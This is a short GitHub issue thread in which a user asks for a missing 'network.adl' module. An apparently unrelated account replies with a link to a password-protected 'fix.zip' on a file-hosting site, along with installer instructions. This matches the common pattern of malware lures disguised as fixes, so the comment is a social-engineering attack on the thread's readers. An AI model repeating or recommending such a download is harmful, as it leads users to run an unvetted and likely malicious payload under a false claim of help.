### ISSUE TITLE
No module named 'network.adl'

### ISSUE THREAD

**Issue by Mugen-chen** [engineerJPark/ORANDNet#2]
Hello author, I'm very interested in your work, but I couldn't find the 'adl' file. Could you please provide it to me?
![屏幕截图 2024-08-26 162925](https://github.com/user-attachments/assets/b3490d3f-bd39-419d-b5ae-72de6d006825)

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Mugen-chen** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."
What is this?
